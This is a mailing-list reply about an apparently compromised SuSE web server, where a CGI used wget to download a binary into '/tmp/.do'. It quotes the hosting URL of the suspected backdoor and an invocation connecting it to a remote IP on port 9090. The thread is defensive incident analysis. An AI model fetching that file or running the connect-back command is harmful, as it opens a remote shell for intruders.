[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [suse-security] Re: Backdoor over http(s)??
I found that server too, and some other "a-bit-worrying" stuff...
For some reason my e-mail never reached this list.. wonder what happens this
> Some CGI at your webserver did run wget to receive some file from
> 126.96.36.199 and save it on your disc as "/tmp/.do".
> wwwrun:nogroup are standard user and group used for apache.
> The file is still avaiable from http://188.8.131.52/manual/.x/rhs
> I don't want to execute it, but strings does list some information:
> usage: %s <IP or hostname> <port>
> (/tmp/.do 184.108.40.206 9090)
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here